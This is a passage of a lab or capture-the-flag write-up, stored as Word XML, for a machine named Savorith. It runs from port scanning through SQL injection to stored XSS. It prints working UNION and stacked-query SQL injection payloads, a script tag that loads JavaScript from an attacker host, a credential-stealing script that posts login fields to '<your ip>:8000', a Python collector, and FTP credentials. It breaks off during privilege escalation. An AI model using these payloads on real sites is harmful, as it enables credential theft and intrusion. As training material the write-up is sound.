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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.c53smvby5vof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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2wiimq4wfpnh" w:id="1"/>
      <w:bookmarkEnd w:id="1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Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center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This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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Savorith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machine. The tested environment was based on real-world scenarios found in corporate infrastructures. If you need support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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support channel on the Discord server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07">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.obbq7ssap67" w:id="2"/>
      <w:bookmarkEnd w:id="2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Reconnaissance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The port scan performed with Nmap identified the following open TCP ports: 21 (FTP), 22 (SSH), and 80 (HTTP).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nmap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-p-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--open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--min-rate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1200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172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16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-sVC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-vvv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565400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="215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5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When accessing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port 21 (FTP)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an active service was identified. Login was not possible because no username and password credentials were available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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374900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="217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When accessing port 80 (HTTP), an active web service was identified displaying the homepage titled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Savorith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959100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="216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jc w:val="both"/>
        <w:rPr/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Directory fuzzing was performed on the web application, identifying the directories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/login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/register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/admin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ffuf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http://&lt;ip-machine&gt;/FUZZ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big.txt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4572000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="219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0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new user was registered in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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721100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="218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Login was performed using the newly created user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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568700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="222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276600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="221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098800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="227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While analyzing the application, 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View Product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button was identified. When triggered, it displayed detailed product information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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289300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="225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In the application URL, a parameter named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was identified, used to specify which product would be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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378200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="231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2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Since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parameter identifies products stored in the database, SQL Injection testing was performed to check for input validation flaws. A single quote character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'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was inserted into the parameter to attempt to break the SQL query and validate the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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The test confirmed the existence of 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SQL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Injection vulnerability in the application, allowing execution of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SQL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queries in the database. It was also identified that the application uses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MySQL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as its database management system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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603500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="228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To begin exploiting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SQL Injection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it was necessary to determine the number of columns returned by the original query.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ORDER BY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command was used, incrementing values sequentially (1, 2, 3...) until the application returned an error, indicating the exact number of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036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 order by 1 -- -  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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 .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Rule="auto"/>
        <w:jc w:val="both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retornou erro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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From value 8 onward, the command returned an error, indicating that the application has 7 columns in total.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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552700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="230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With this information,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UNION SELECT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command was used to combine SQL queries and extract data from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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Next, enumeration of all databases on the server was performed by querying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information_schema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a default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MySQL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database containing metadata about all other databases, tables, columns, and system structures.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LIMIT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command was used to retrieve records sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Rule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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union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,schema_name,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information_schema.schemata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limit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1--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Rule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="232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Changing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LIMIT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to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1,1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identified the default database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performance_schema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With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2,1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savorith_db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database was discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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543300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="233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390900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="234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The databases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information_schema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performance_schema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are system defaults.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savorith_db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database was user-created, so it was selected for table extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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To extract tables from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savorith_db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a query was performed on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information_schema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using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table_schema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to filter tables from the specific database. Enumeration was performed by incrementing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LIMIT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value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='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savorith_db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limit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1--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619500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="235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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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Four tables were extracted from the database: the first table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admin_logins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(LIMIT 1,1), the second table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navbar_buttons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(LIMIT 2,1), the third table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products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(LIMIT 3,1), and the fourth table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users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(LIMIT 4,1).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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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Next, the columns from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admin_logins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users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tables were extracted.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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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extract the columns, a query was made to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information_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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accessing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columns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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table and filtering by the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column_name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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field, which contains the names of all columns in the database tables.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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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the first position (LIMIT 0,1) the column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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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was identified.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 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='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savorith_db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table_name=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'admin_logins'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limit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1--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705100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="236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" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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 the first position (LIMIT 0,1) the column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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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was identified, at the second (LIMIT 1,1) the column ip, and at the third (LIMIT 2,1) the column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login_time.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755900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="237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882900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="238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With the columns identified, data could be extracted directly by specifying the column and table names in the SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071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union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,id,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admin_logins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limit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1--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705100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="239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035300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="204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After extracting all columns from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admin_logins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users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tables, no relevant information was found. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079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However,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navbar_buttons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table was identified, suggesting possible control over buttons displayed on the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A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Column extraction was performed on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navbar_buttons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first column identified was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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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(LIMIT 0,1).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 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='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savorith_db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table_name=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'navbar_buttons'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limit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1--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984500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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 position (LIMIT 0,1) the column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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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was identified, at position (LIMIT 1,1) the column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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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at position (LIMIT 2,1) the column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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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and at position (LIMIT 3,1) the column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show_auth.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832100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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654300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="207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086100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="208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CONCAT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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function was used to concatenate the column data and view all information simultaneously.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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Upon extracting the data from these columns, the following information was obtained.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union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,CONCAT(id,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,name,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'-'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,url,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'-'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,show_auth),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navbar_buttons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limit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1--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060700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="209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This database stores navigation bar button information, including the name and URL of each button. To test functionality, a button was inserted into the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090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'; insert into navbar_buttons(id, url, name, show_auth) values(5, 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/admin/teste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'teste'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Although the SQL injection returned an error, accessing the homepage confirmed that the button was successfully created in the web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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463800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="210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098800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="212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Through SQL injection, it was possible to insert an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INSERT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query into the database that added a button to the front-end. This button allowed JavaScript code injection, resulting in an XSS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;img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src=x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onerror=alert(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'; insert into navbar_buttons(id, url, name, show_auth) values(8, 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/teste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'&lt;img src=x onerror=alert(1)&gt;'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lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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400300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="21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832100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="21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Using this vulnerability, it was possible to perform an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UPDATE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on the database to modify the legitimate login button. The button was altered to execute malicious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JavaScript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code containing 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keylogger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to capture administrator credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6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&lt;script&gt;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tag was created referencing an external JavaScript file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file.js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hosted on an attacker-controlled server. The script intercepts login form data and transmits it to the attacker’s server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7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lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script</w:t>
      </w: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color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">src=//&lt;your-ip&gt;/file.js&lt;/script&gt;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Rule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f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UPDATE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navbar_buttons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SET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name=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'"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;script src=//&lt;your-ip&gt;/file.js&gt;&lt;/script&gt;'</w:t>
      </w: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color w:val="37474f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color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1--</w:t>
      </w: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color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB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832100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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file.js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interval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setInterval(()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document.querySelector(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'input[name="username"]'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document.querySelector(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'input[name="password"]'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(user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user.value.length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pass.value.length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fetch(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'http://&lt;your ip&gt;:8000/'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method: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'POST'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mode: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'no-cors'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body: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`u=${encodeURIComponent(user.value)}&amp;p=${encodeURIComponent(pass.value)}`,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headers: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'Content-Type'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'application/x-www-form-urlencoded'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clearInterval(interval);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4229100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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9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When loading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/login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route,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ile.js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script is automatically executed by the admin user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8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898900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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8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file.js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file was accessed multiple times on the attacker’s server. This script forwards captured credentials to a second external server running a Python script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server.py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responsible for collecting the data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC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server.py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http.server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BaseHTTPRequestHandler,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HTTPServer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Handler(BaseHTTPRequestHandler):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do_POST(self):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int(self.headers.get(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'Content-Length'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self.rfile.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read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(length).decode()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print(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"Received:"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body)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self.send_response(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self.end_headers()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server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HTTPServer((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"0.0.0.0"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Handler)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print(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"Listening on port 8000..."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server.serve_forever()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Through this method, administrator credentials were captured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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819775" cy="3209925"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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3209925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Login was then performed using the obtained credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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4635500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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5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The administration panel displayed only a static page with no functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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289300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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Using the same credentials, access to the FTP service was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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843588" cy="3457575"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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3588" cy="3457575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On the FTP server, the directory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savorith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was identified, containing all web application files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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4432300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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2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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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download of all files present in the directory was performed using the wget tool.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wget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wget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ftp://admin:Qm3hvAzpM6OJ7@&lt;ip-machine&gt;/savorith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806700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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With access to all the web application files, the hidden directory .git was identified, which contains the full versioning history of the application.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784600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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46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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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With this, we can read all the web application logs.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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With the command.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759200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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92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During analysis of commit history, SSH credentials were discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD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543300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.d3yb9r417k3c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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6walx9mv7j96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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kcif2tqtjvhh" w:id="5"/>
      <w:bookmarkEnd w:id="5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Exploitation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user flag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Using the obtained credentials, SSH access was established with user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webadmin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webadmin@&lt;ip-your-machine&gt;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86100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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01900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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240" w:lineRule="auto"/>
        <w:jc w:val="both"/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With access to the system, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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 </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc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pspy</w:t>
        </w:r>
      </w:hyperlink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tool was executed to monitor the processes running on the machine.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0" w:right="0" w:firstLine="0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On the attacker host, we started a Python server to serve the pspy binary, and then downloaded the file to the target machine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python3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http.server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wget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&lt;your-ip&gt;/pspy64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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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2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086100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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Upon executing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pspy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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binary on the target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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
